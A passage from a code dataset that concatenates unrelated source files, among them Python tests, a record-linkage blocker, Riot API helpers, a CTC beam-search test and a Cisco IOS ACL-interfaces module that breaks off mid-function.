self.ts2_request(ts2, {'url': ts2.mockserver.url('jsrender', gzip=False)})\n self.assertProxied(r1.text)\n\n # another proxy\n r2 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': 'test',\n })\n self.assertProxied(r2.text)\n\n # invalid proxy profile\n r3 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': 'nonexisting',\n })\n self.assertStatusCode(r3, 400)\n\n # 'none' disables default.ini\n r4 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': 'none',\n })\n self.assertNotProxied(r4.text)\n\n # empty 'proxy' argument disables default.ini\n r5 = self.ts2_request(ts2, {\n 'url': ts2.mockserver.url('jsrender', gzip=False),\n 'proxy': '',\n })\n self.assertNotProxied(r5.text)\n\n finally:\n self.remove_default_ini(ts2)\n","sub_path":"splash/tests/test_proxy.py","file_name":"test_proxy.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"47441734","text":"from mock import Mock\nfrom thefuck.utils import sudo_support, wrap_settings\nfrom thefuck.types import Settings\nfrom tests.utils import Command\n\n\ndef test_wrap_settings():\n fn = lambda _, settings: settings\n assert wrap_settings({'key': 'val'})(fn)(None, Settings({})) \\\n == {'key': 'val'}\n assert wrap_settings({'key': 'new-val'})(fn)(\n None, Settings({'key': 'val'})) == {'key': 'new-val'}\n\n\ndef test_sudo_support():\n fn = Mock(return_value=True, __name__='')\n assert sudo_support(fn)(Command('sudo ls'), None)\n fn.assert_called_once_with(Command('ls'), None)\n\n fn.return_value = False\n assert not sudo_support(fn)(Command('sudo ls'), None)\n\n fn.return_value = 'pwd'\n assert sudo_support(fn)(Command('sudo ls'), None) == 'sudo pwd'\n\n assert sudo_support(fn)(Command('ls'), None) == 'pwd'\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"390052781","text":"testes = int(input())\n\nfor teste in range(testes):\n hora, minuto, ocorrencia = list(map(int, input().split()))\n\n if hora < 10:\n hora = \"0\" + str(hora)\n\n if minuto < 10:\n minuto = \"0\" + str(minuto)\n\n if ocorrencia == 1:\n print(\"%s:%s - A porta abriu!\" % (hora, minuto))\n else:\n print(\"%s:%s - A porta fechou!\" % (hora, minuto))\n","sub_path":"URI Online Judge - Beecrowd/Python 3/2152 - Pepe, Já Tirei a Vela! - Python 3.py","file_name":"2152 - Pepe, Já Tirei a Vela! - Python 3.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"420882848","text":"import logging\n\nimport numpy as np\n\nimport skrough.typing as rght\nfrom skrough.algorithms.key_names import (\n CONFIG_CHAOS_FUN,\n CONFIG_DAAR_ALLOWED_RANDOMNESS,\n CONFIG_DAAR_PROBES_COUNT,\n VALUES_GROUP_INDEX,\n VALUES_X,\n VALUES_X_COUNTS,\n VALUES_Y,\n VALUES_Y_COUNT,\n)\nfrom skrough.attrs_checks import check_if_attr_better_than_shuffled\nfrom skrough.logs import log_start_end\nfrom skrough.structs.state import ProcessingState\n\nlogger = logging.getLogger(__name__)\n\n\nDEFAULT_DAAR_SMOOTHING_PARAMETER = 1\n\n\n@log_start_end(logger)\ndef filter_hook_attrs_first_daar(\n state: ProcessingState,\n elements: rght.Elements,\n) -> rght.Elements:\n daar_probes_count = state.config[CONFIG_DAAR_PROBES_COUNT]\n logger.debug(\"Param daar_probes_count == %d\", daar_probes_count)\n daar_allowed_randomness = state.config[CONFIG_DAAR_ALLOWED_RANDOMNESS]\n logger.debug(\"Param daar_allowed_randomness == %f\", daar_allowed_randomness)\n chaos_fun = state.config[CONFIG_CHAOS_FUN]\n\n group_index = state.values[VALUES_GROUP_INDEX]\n x = state.values[VALUES_X]\n x_counts = state.values[VALUES_X_COUNTS]\n y = state.values[VALUES_Y]\n y_count = state.values[VALUES_Y_COUNT]\n result = []\n for attr in elements:\n logger.debug(\"Check if attr <%d> is better than shuffled\", attr)\n if check_if_attr_better_than_shuffled(\n group_index=group_index,\n attr_values=x[:, attr],\n attr_values_count=x_counts[attr],\n values=y,\n values_count=y_count,\n probes_count=daar_probes_count,\n allowed_randomness=daar_allowed_randomness,\n chaos_fun=chaos_fun,\n rng=state.rng,\n ):\n logger.debug(\n \"Attr <%d> is better than shuffled with respect to allowed_randomness\",\n attr,\n )\n result.append(attr)\n break # in this version we finish whenever the first one is found\n return np.asarray(result)\n","sub_path":"src/skrough/algorithms/hooks/filter_hooks.py","file_name":"filter_hooks.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"603214587","text":"import logging\nimport pandas as pd\nimport numpy as np\n\nfrom blocker import Blocker\nfrom magellan.core.mtable import MTable\nfrom magellan.core.mcandset import MCandset\n\nlogger = logging.getLogger(__name__)\n\nclass AttrEquivalenceBlocker(Blocker):\n\n def block_tables(self, left, right, left_on, right_on, left_output_colnames=None, right_output_colnames=None):\n left_output_colnames, right_output_colnames = check_columns(left, right, left_on, right_on,\n left_output_colnames, right_output_colnames)\n\n mleft, mright = rem_nans(left, right, left_on, right_on)\n candset = pd.merge(mleft, mright, left_on=left_on, right_on=right_on, suffixes=('_left', '_right'))\n\n ret_cols, fin_cols = out_cols(left.get_key(), right.get_key(), list(candset.columns),\n left_output_colnames, right_output_colnames)\n\n candset = candset[ret_cols]\n candset.columns = fin_cols\n candset = MTable(candset)\n # note the special syntax here\n candset._MTable__set_key(None)\n candset = MCandset(candset, left, right)\n return candset\n\n def block_tuples(self, left, right, left_on, right_on):\n return tuple(left[left_on]) == tuple(right[right_on])\n\n def block_candset(self, candset, left_on, right_on, inplace=False):\n if not isinstance(candset, MCandset):\n raise TypeError('Input should be of type MCandset')\n\n if inplace is False:\n candset = candset.copy()\n\n left = candset.left_table\n right = candset.right_table\n table = candset.candset_table\n # Calling check_columns: bit of overkill because left and right output cols are not part of input\n check_columns(left, right, left_on, right_on, None, None)\n\n # construct key strings that can be queried in the candidate set table.\n key_l = 'left.' + left.get_key()\n key_r = 'right.' + right.get_key()\n valid = []\n for idx, row in table.iterrows():\n val_l = row[key_l]\n val_r = row[key_r]\n t_l = tuple(left.ix[val_l, left_on])\n t_r = tuple(right.ix[val_r, right_on])\n if np.NaN in t_l or np.NaN in t_r:\n valid.append(False)\n elif t_l == t_r:\n valid.append(True)\n else:\n valid.append(False)\n candset.candset_table = table[valid]\n return candset\n\n\n\n\n\n\n\n\n# helper functions\n\ndef out_cols(left_id, right_id, cand_cols, left_output_colnames, right_output_colnames):\n left_id = [left_id]\n right_id = [right_id]\n ret_cols = []\n # retain columns from merge\n ret_id_left = [retain_names(x, cand_cols, '_left') for x in left_id]\n ret_id_right = [retain_names(x, cand_cols, '_right') for x in right_id]\n ret_cols.extend(ret_id_left)\n ret_cols.extend(ret_id_right)\n\n ret_left_col = [retain_names(x, cand_cols, '_left') for x in left_output_colnames]\n ret_right_col = [retain_names(x, cand_cols, '_right') for x in right_output_colnames]\n ret_cols.extend(ret_left_col)\n ret_cols.extend(ret_right_col)\n\n # final columns in the output\n fin_cols = []\n fin_id_left = [final_names(x, 'left.') for x in left_id]\n fin_id_right = [final_names(x, 'right.') for x in right_id]\n fin_cols.extend(fin_id_left)\n fin_cols.extend(fin_id_right)\n\n fin_left_col = [final_names(x, 'left.') for x in left_output_colnames]\n fin_right_col = [final_names(x, 'right.') for x in right_output_colnames]\n fin_cols.extend(fin_left_col)\n fin_cols.extend(fin_right_col)\n\n return(ret_cols, fin_cols)\n\ndef flatten_list(inp_list):\n return [item for sublist in inp_list for item in sublist]\n\ndef final_names(inp_name, prefix):\n name_str = str(inp_name)\n name_str = prefix + name_str\n return name_str\n\ndef check_columns(left, right, left_on, right_on, left_output_colnames, right_output_colnames):\n # check keys are set\n assert left.get_key() is not None, 'Key is not set for left table'\n assert right.get_key() is not None, 'Key is not set for right table'\n # check left_on, right_on form a subset of left and right tables\n assert set(left_on).issubset(left.columns) is True, 'Left join attribute is not in left table columns'\n assert set(right_on).issubset(right.columns) is True, 'Right join attribute is not in right table columns'\n if left_output_colnames is None:\n left_output_colnames = left.columns\n if right_output_colnames is None:\n right_output_colnames = right.columns\n assert set(left_output_colnames).issubset(left.columns) is True, 'Left output columns doesnot form a ' \\\n 'subset of left table columns'\n assert set(right_output_colnames).issubset(right.columns) is True, 'Right output columns doesnot form a ' \\\n 'subset of right table columns'\n left_output_colnames = sorted(set(left_output_colnames) - set([left.get_key()]))\n right_output_colnames = sorted(set(right_output_colnames) - set([right.get_key()]))\n return left_output_colnames, right_output_colnames\n\ndef retain_names(inp_name, colnames, suffix):\n if inp_name in colnames:\n return inp_name\n else:\n name_str = str(inp_name)\n name_str += suffix\n return name_str\n\ndef rem_nans(left, right, left_on, right_on):\n #ind = (np.where(wal['isbn'].notnull())[0])\n # get the index values at which the value is not nan\n lists_l = [list(left.index.values[np.where(left[x].notnull())[0]]) for x in left_on]\n lists_l = sorted(set.intersection(*map(set, lists_l)))\n #lists_r = [list(right[x]) for x in right_on]\n lists_r = [list(right.index.values[np.where(right[x].notnull())[0]]) for x in right_on]\n lists_r = sorted(set.intersection(*map(set, lists_r)))\n mleft = left.ix[lists_l]\n mright = right.ix[lists_r]\n return mleft, mright\n\n\n\n","sub_path":"magellan/blocker/attr_equiv_blocker.py","file_name":"attr_equiv_blocker.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"123494510","text":"#file containing functions that use riot api calls\n\nimport os\nimport requests\n\nfrom dotenv import load_dotenv \n\n#load riot api token from .env file\nload_dotenv()\ntoken = os.getenv('RIOT_TOKEN')\n\ndef game(summoner_name):\n\n request_summonerID = v4_summoners(summoner_name)\n if request_summonerID.status_code == 200:\n\n summonerID = request_summonerID.json()['id']\n request_match_info = v4_active_games(summonerID)\n\n if request_match_info.status_code == 200:\n\n match_info = request_match_info.json()\n blue_side = 'Blue Side: \\n \\n'\n red_side = 'Red Side: \\n \\n' \n\n for summoners in match_info['participants']:\n \n if summoners['teamId'] == 100:\n \n blue_side = blue_side + ' ' + summoners['summonerName'] + ' ' + get_champion_by_ID(summoners['championId']) + ' ' + get_soloq_rank(summoners['summonerId']) + ' \\n'\n\n else:\n\n red_side = red_side + ' ' + summoners['summonerName'] + ' ' + get_champion_by_ID(summoners['championId']) + ' ' + get_soloq_rank(summoners['summonerId']) + ' \\n' \n \n game_info = blue_side + '\\n' + red_side\n\n return game_info\n \n else:\n\n return 'Your requested summoner is currently not in-game.'\n\n\n elif request_summonerID.status_code == 404:\n\n return 'The requested summoner does not exist.'\n\n else:\n\n print(request_summonerID.status_code)\n return 'The servers of riot are boosted just like your teammates. Try again later!'\n\n\n\n\ndef v4_summoners(summoner_name):\n\n return requests.get('https://euw1.api.riotgames.com/lol/summoner/v4/summoners/by-name/' + summoner_name + '?api_key=' + token)\n\n\ndef v4_active_games(summoner_ID):\n\n return requests.get('https://euw1.api.riotgames.com/lol/spectator/v4/active-games/by-summoner/' + summoner_ID + '?api_key=' + token)\n\n\ndef get_soloq_rank(summoner_ID):\n\n\n '''\n\n returns a string in the format of: \n Example: GOLD II 68LP 46-43 \n\n '''\n r = requests.get('https://euw1.api.riotgames.com/lol/league/v4/entries/by-summoner/' + summoner_ID + '?api_key=' + token)\n \n json_file = r.json()\n\n if json_file == []:\n\n return 'Not ranked in yet.'\n\n for i in range (0, len(json_file)):\n\n if json_file[i]['queueType'] == 'RANKED_SOLO_5x5':\n\n return json_file[i]['tier'] + ' ' + json_file[i]['rank'] + ' ' + str(json_file[i]['leaguePoints']) + 'LP ' + str(json_file[i]['wins']) + '-' + str(json_file[i]['losses'])\n\n return 'Not ranked in yet.'\n\n\n\ndef get_champion_by_ID(champion_ID):\n\n #get name of a champion when given its ID\n\n champion_ID = str(champion_ID)\n r = requests.get('http://ddragon.leagueoflegends.com/cdn/10.4.1/data/en_US/champion.json')\n\n for i in list(r.json()['data']):\n if r.json()['data'][i]['key'] == champion_ID:\n return(i)","sub_path":"riot_api_calls.py","file_name":"riot_api_calls.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"439112076","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask\nimport json\nfrom db import *\nfrom screen_control import compare_time\n\napp = Flask(__name__, static_url_path='')\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n page = ''\n return page\n\n\n@app.route('/getJobs', methods=['POST', 'GET'])\ndef get_jobs():\n # 请求时间不能太长,否则影响时间判断\n compare_time()\n jobs_list = query_by_date()\n jobs_dic_list = []\n for job in jobs_list:\n job_dic = {'job_name': job[1], 'job_company': job[2], 'job_salary': job[4]}\n jobs_dic_list.append(job_dic)\n return json.dumps(jobs_dic_list)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"huanhuan2.0.py","file_name":"huanhuan2.0.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"344107722","text":"from Blockchainclass import BlockChain\nfrom Blockclass import Block\n\npycoin = BlockChain();\npycoin.addBlock(Block(1, 'amount: 4'));\npycoin.addBlock(Block(2, 'amount: 33'));\npycoin.chain[1].data = 'amount : 1000'\npycoin.chain[1].hash = pycoin.chain[1].calculateHash()\nfor i in pycoin.chain:\n\ti.showblock()\nprint(\"Is the blockchain valid? \" + str(pycoin.isChainValid()) );\n","sub_path":"2_simple_blockchain_with_validation/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"156790618","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\nfrom tensorflow.python.ops import array_ops\nfrom ctc_beam_search_decoder import *\nimport time\n\nvocab_list = ['\\'', ' ']+[chr(i) for i in range(97, 101)]\n#vocab_list = ['\\'', ' ']+[chr(i) for i in range(97, 123)]\n\ndef generate_probs(num_time_steps, probs_dim):\n probs_mat = np.random.random(size=(num_time_steps, probs_dim))\n probs_mat = [probs_mat[index]/sum(probs_mat[index]) for index in range(num_time_steps)]\n return probs_mat\n\ndef test_beam_search_decoder():\n max_time_steps = 6\n probs_dim = len(vocab_list)+1\n beam_size = 20\n num_results_per_sample = 1\n \n input_prob_matrix_0 = np.asarray(generate_probs(max_time_steps, probs_dim), dtype=np.float32)\n print(input_prob_matrix_0)\n # Add arbitrary offset - this is fine\n input_log_prob_matrix_0 = np.log(input_prob_matrix_0) #+ 2.0\n\n # len max_time_steps array of batch_size x depth matrices\n inputs = ([\n input_log_prob_matrix_0[t, :][np.newaxis, :] for t in range(max_time_steps)]\n )\n\n inputs_t = [ops.convert_to_tensor(x) for x in inputs]\n inputs_t = array_ops.stack(inputs_t)\n \n # run CTC beam search decoder in tensorflow\n with tf.Session() as sess:\n decoded, log_probabilities = tf.nn.ctc_beam_search_decoder(inputs_t,[max_time_steps],beam_width=beam_size,top_paths=num_results_per_sample,merge_repeated=False)\n tf_decoded = sess.run(decoded)\n tf_log_probs = sess.run(log_probabilities) \n \n\n # run original CTC beam search decoder \n beam_result = ctc_beam_search_decoder(\n\t\t\tprobs_seq=input_prob_matrix_0,\n\t\t\tbeam_size=beam_size,\n vocabulary=vocab_list,\n blank_id=len(vocab_list),\n cutoff_prob=1.0, \n\t\t\t)\n \n # run log- CTC beam search decoder \n beam_result_log = ctc_beam_search_decoder_log(\n\t\t\tprobs_seq=input_prob_matrix_0,\n\t\t\tbeam_size=beam_size,\n vocabulary=vocab_list,\n blank_id=len(vocab_list), \n cutoff_prob=1.0, \n\t\t\t)\n # compare decoding result\n print(\"{tf-decoder log probs} \\t {org-decoder log probs} \\t{log-decoder log probs}: {tf_decoder result} {org_decoder result} {log-decoder result}\")\n for index in range(num_results_per_sample):\n tf_result = ''.join([vocab_list[i] for i in tf_decoded[index].values])\n print(('%6f\\t%f\\t%f: ') % (tf_log_probs[0][index], beam_result[index][0], beam_result_log[index][0]), \n tf_result,'\\t', beam_result[index][1], '\\t', beam_result_log[index][1])\n\nif __name__ == '__main__':\n test_beam_search_decoder()\n","sub_path":"test_ctc_beam_search_decoder.py","file_name":"test_ctc_beam_search_decoder.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"159039153","text":"def processNewTime(newTime, knownTimes):\n for oldTime in knownTimes:\n #Check for overrlap\n if newTime[1] >= oldTime[0] and newTime[0] <= oldTime[1]:\n oldTime[0] = min(oldTime[0], newTime[0])\n oldTime[1] = max(oldTime[1], newTime[1])\n break\n else: # Add if the list is empty\n knownTimes.append(list(newTime))\n\nif __name__ == \"__main__\":\n # Input as list of tuples\n # Requires \"input.txt\" to contain the input\n times = []\n for pair in open(\"input.txt\", \"r\").read().split(\"\\n\"):\n times.append(tuple(int(time) for time in pair.split()))\n\n # Process each time\n knownIntervals = []\n for time in times:\n processNewTime(time, knownIntervals)\n \n # check internal overrlap\n finalList = []\n for pair in knownIntervals:\n processNewTime(pair, finalList)\n\n total = 0 # Find the number of hours on\n for time in finalList:\n total += time[1]- time[0]\n\n print(total)\n","sub_path":"Small Challenges/Daily Programmer/20180115_Light.py","file_name":"20180115_Light.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"423783344","text":"from javax.servlet.http import Cookie\r\nfrom cn.edustar.jitar.util import ParamUtil\r\n\r\nclass admin_feed_list:\r\n def __init__(self):\r\n self.params = ParamUtil(request)\r\n \r\n def execute(self):\r\n pwd = self.params.safeGetStringParam(\"pwd\")\r\n self.feedbackService = __spring__.getBean(\"feedbackService\") \r\n if pwd != \"\":\r\n if self.feedbackService.getUserData() == pwd:\r\n self.saveToCookie()\r\n\r\n if self.getCookie() == \"\":\r\n return \"/WEB-INF/ftl/admin/admin_feed_nothing.ftl\"\r\n if request.getMethod() == \"POST\":\r\n self.delete()\r\n feedlist = self.feedbackService.getAllFeedbackList()\r\n request.setAttribute(\"feedlist\",feedlist)\r\n return \"/WEB-INF/ftl/admin/admin_feed_list.ftl\" \r\n \r\n def delete(self):\r\n guids = self.params.safeGetIntValues(\"guid\")\r\n for g in guids:\r\n f = self.feedbackService.getFeedbackById(g)\r\n if f != None:\r\n self.feedbackService.deleteFeedback(f)\r\n \r\n def saveToCookie(self):\r\n namecookie = Cookie(\"m\",\"m\")\r\n namecookie.setMaxAge(300)\r\n namecookie.setPath(\"/\")\r\n response.addCookie(namecookie)\r\n \r\n def getCookie(self):\r\n cookie = \"\"\r\n cookies = request.getCookies()\r\n if cookies == None:\r\n return cookie\r\n for c in cookies:\r\n if c.getName() == \"m\":\r\n cookie = c.getValue()\r\n return cookie","sub_path":"WebContent/manage/admin_feed_list.py","file_name":"admin_feed_list.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"328015087","text":"import logging\nimport os\nimport shutil\nimport yaml\n\nfrom concreate.errors import ConcreateError\n\ntry:\n import ConfigParser as configparser\nexcept:\n import configparser\n\nlogger = logging.getLogger('concreate')\n\ncfg = {}\n\n\ndef get_cfg(config_path):\n \"\"\"Returns configuration from concreate config file and prepares sensible defaults\n\n params:\n config_path - path to a concreate config file (expanding user)\n \"\"\"\n cp = configparser.ConfigParser()\n cp.read(os.path.expanduser(config_path))\n cfg = cp._sections\n cfg['common'] = cfg.get('common', {})\n cfg['common']['work_dir'] = cfg.get('common').get('work_dir', '~/.concreate.d')\n return cfg\n\n\ndef cleanup(target):\n \"\"\" Prepates target/image directory to be regenerated.\"\"\"\n dirs_to_clean = [os.path.join(target, 'image', 'modules'),\n os.path.join(target, 'image', 'repos'),\n os.path.join(target, 'repo')]\n for d in dirs_to_clean:\n if os.path.exists(d):\n logger.debug(\"Removing dirty directory: '%s'\" % d)\n shutil.rmtree(d)\n\n\ndef load_descriptor(descriptor):\n \"\"\" parses descriptor and validate it against requested schema type\n\n Args:\n descriptor - yaml descriptor or path to a descriptor to be loaded\n\n Returns descriptor as a dictionary\n \"\"\"\n if not os.path.exists(descriptor):\n logger.debug(\"Descriptor path '%s' doesn't exists, trying to parse it directly.\"\n % descriptor)\n try:\n return yaml.safe_load(descriptor)\n except Exception as ex:\n raise ConcreateError('Cannot load descriptor.', ex)\n\n logger.debug(\"Loading descriptor from path '%s'.\" % descriptor)\n\n with open(descriptor, 'r') as fh:\n return yaml.safe_load(fh)\n","sub_path":"concreate/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"569901804","text":"#\n# -*- coding: utf-8 -*-\n# Copyright 2019 Red Hat Inc.\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\"\"\"\nThe ios_acl_interfaces class\nIt is in this file where the current configuration (as dict)\nis compared to the provided configuration (as dict) and the command set\nnecessary to bring the current configuration to it's desired end-state is\ncreated\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nfrom ansible_collections.ansible.netcommon.plugins.module_utils.network.common.cfg.base import (\n ConfigBase,\n)\nfrom ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import (\n to_list,\n)\nfrom ansible_collections.cisco.ios.plugins.module_utils.network.ios.facts.facts import (\n Facts,\n)\nfrom ansible.module_utils.six import iteritems\nfrom ansible_collections.cisco.ios.plugins.module_utils.network.ios.utils.utils import (\n remove_duplicate_interface,\n normalize_interface,\n)\n\n\nclass Acl_Interfaces(ConfigBase):\n \"\"\"\n The ios_acl_interfaces class\n \"\"\"\n\n gather_subset = [\"!all\", \"!min\"]\n\n gather_network_resources = [\"acl_interfaces\"]\n\n def __init__(self, module):\n super(Acl_Interfaces, self).__init__(module)\n\n def get_acl_interfaces_facts(self, data=None):\n \"\"\" Get the 'facts' (the current configuration)\n :rtype: A dictionary\n :returns: The current configuration as a dictionary\n \"\"\"\n facts, _warnings = Facts(self._module).get_facts(\n self.gather_subset, self.gather_network_resources, data=data\n )\n acl_interfaces_facts = facts[\"ansible_network_resources\"].get(\n \"acl_interfaces\"\n )\n if not acl_interfaces_facts:\n return []\n\n return acl_interfaces_facts\n\n def execute_module(self):\n \"\"\" Execute the module\n :rtype: A dictionary\n :returns: The result from moduel execution\n \"\"\"\n result = {\"changed\": False}\n commands = list()\n warnings = list()\n\n if self.state in self.ACTION_STATES:\n existing_acl_interfaces_facts = self.get_acl_interfaces_facts()\n else:\n existing_acl_interfaces_facts = []\n\n if self.state in self.ACTION_STATES or self.state == \"rendered\":\n commands.extend(self.set_config(existing_acl_interfaces_facts))\n\n if commands and self.state in self.ACTION_STATES:\n if not self._module.check_mode:\n self._connection.edit_config(commands)\n result[\"changed\"] = True\n\n if self.state in self.ACTION_STATES:\n result[\"commands\"] = commands\n\n if self.state in self.ACTION_STATES or self.state == \"gathered\":\n changed_acl_interfaces_facts = self.get_acl_interfaces_facts()\n elif self.state == \"rendered\":\n result[\"rendered\"] = commands\n elif self.state == \"parsed\":\n running_config = self._module.params[\"running_config\"]\n if not running_config:\n self._module.fail_json(\n msg=\"value of running_config parameter must not be empty for state parsed\"\n )\n result[\"parsed\"] = self.get_acl_interfaces_facts(\n data=running_config\n )\n else:\n changed_acl_interfaces_facts = []\n\n if self.state in self.ACTION_STATES:\n result[\"before\"] = existing_acl_interfaces_facts\n if result[\"changed\"]:\n result[\"after\"] = changed_acl_interfaces_facts\n elif self.state == \"gathered\":\n result[\"gathered\"] = changed_acl_interfaces_facts\n\n result[\"warnings\"] = warnings\n\n return result\n\n def set_config(self, existing_acl_interfaces_facts):\n \"\"\" Collect the configuration from the args passed to the module,\n collect the current configuration (as a dict from facts)\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the deisred configuration\n \"\"\"\n want = self._module.params[\"config\"]\n if want:\n for item in want:\n item[\"name\"] = normalize_interface(item[\"name\"])\n\n have = existing_acl_interfaces_facts\n resp = self.set_state(want, have)\n return to_list(resp)\n\n def set_state(self, want, have):\n \"\"\" Select the appropriate function based on the state provided\n :param want: the desired configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the deisred configuration\n \"\"\"\n commands = []\n\n state = self._module.params[\"state\"]\n if (\n state in (\"overridden\", \"merged\", \"replaced\", \"rendered\")\n and not want\n ):\n self._module.fail_json(\n msg=\"value of config parameter must not be empty for state {0}\".format(\n state\n )\n )\n\n if state == \"overridden\":\n commands = self._state_overridden(want, have)\n elif state == \"deleted\":\n commands = self._state_deleted(want, have)\n elif state == \"merged\" or state == \"rendered\":\n commands = self._state_merged(want, have)\n elif state == \"replaced\":\n commands = self._state_replaced(want, have)\n\n return commands\n\n def _state_replaced(self, want, have):\n \"\"\" The command generator when state is replaced\n :param want: the desired configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the deisred configuration\n \"\"\"\n commands = []\n\n for interface in want:\n for each in have:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n continue\n commands.extend(self._clear_config(interface, each, \"replaced\"))\n commands.extend(self._set_config(interface, each))\n # Remove the duplicate interface call\n commands = remove_duplicate_interface(commands)\n\n return commands\n\n def _state_overridden(self, want, have):\n \"\"\" The command generator when state is overridden\n :param want: the desired configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to migrate the current configuration\n to the desired configuration\n \"\"\"\n commands = []\n\n for each in have:\n for interface in want:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n # We didn't find a matching desired state, which means we can\n # pretend we recieved an empty desired state.\n interface = dict(name=each[\"name\"])\n commands.extend(self._clear_config(interface, each))\n continue\n commands.extend(self._clear_config(interface, each, \"overridden\"))\n commands.extend(self._set_config(interface, each))\n # Remove the duplicate interface call\n commands = remove_duplicate_interface(commands)\n\n return commands\n\n def _state_merged(self, want, have):\n \"\"\" The command generator when state is merged\n :param want: the additive configuration as a dictionary\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to merge the provided into\n the current configuration\n \"\"\"\n commands = []\n\n for interface in want:\n for each in have:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n # configuring non-existing interface\n commands.extend(self._set_config(interface, dict()))\n continue\n commands.extend(self._set_config(interface, each))\n\n return commands\n\n def _state_deleted(self, want, have):\n \"\"\" The command generator when state is deleted\n :param want: the objects from which the configuration should be removed\n :param have: the current configuration as a dictionary\n :rtype: A list\n :returns: the commands necessary to remove the current configuration\n of the provided objects\n \"\"\"\n commands = []\n\n if want:\n for interface in want:\n for each in have:\n if each[\"name\"] == interface[\"name\"]:\n break\n else:\n continue\n commands.extend(self._clear_config(interface, each))\n else:\n for each in have:\n commands.extend(self._clear_config(dict(), each))\n\n return commands\n\n def dict_to_set(self, input_dict, test_set, final_set, count=0):\n # recursive function to convert input dict to set for comparision\n test_dict = dict()\n if isinstance(input_dict, dict):\n input_dict_len = len(input_dict)\n for k, v in sorted(iteritems(input_dict)):\n count += 1\n if isinstance(v, list):\n for each in v:\n if isinstance(each, dict):\n input_dict_len = len(each)\n if [\n True for i in each.values() if type(i) == list\n ]:\n self.dict_to_set(each, set(), final_set, count)\n else:\n self.dict_to_set(each, test_set, final_set, 0)\n else:\n if v is not None:\n test_dict.update({k: v})\n if (\n tuple(iteritems(test_dict)) not in test_set\n and count == input_dict_len\n ):\n test_set.add(tuple(iteritems(test_dict)))\n count = 0\n if count == input_dict_len + 1:\n test_set.update(tuple(iteritems(test_dict)))\n final_set.add(tuple(test_set))\n\n def _set_config(self, want, have):\n \"\"\" Function that sets the acls config based on the want and have config\n :param want: want config\n :param have: have config\n :param acl_want: want acl config\n :param afi: acl afi type\n :rtype: A list\n :returns: the commands generated based on input want/have params\n \"\"\"\n commands = []\n\n want_set = set()\n have_set = set()\n self.dict_to_set(want, set(), want_set)\n self.dict_to_set(have, set(), have_set)\n\n for w in want_set:\n want_afi = dict(w).get(\"afi\")\n if have_set:\n\n def common_diff_config_code(diff_list, cmd, commands):\n for each in diff_list:\n try:\n temp = dict(each)\n temp_cmd = cmd + \" {0} {1}\".format(\n temp[\"name\"], temp[\"direction\"]\n )\n if temp_cmd not in commands:\n commands.append(temp_cmd)\n except ValueError:\n continue\n\n for h in have_set:\n have_afi = dict(h).get(\"afi\")\n if have_afi == want_afi:\n if want_afi == \"ipv4\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ip access-group\"\n common_diff_config_code(diff, cmd, commands)\n if want_afi == \"ipv6\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ipv6 traffic-filter\"\n common_diff_config_code(diff, cmd, commands)\n break\n else:\n if want_afi == \"ipv4\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ip access-group\"\n common_diff_config_code(diff, cmd, commands)\n if want_afi == \"ipv6\":\n diff = set(w) - set(h)\n if diff:\n cmd = \"ipv6 traffic-filter\"\n common_diff_config_code(diff, cmd, 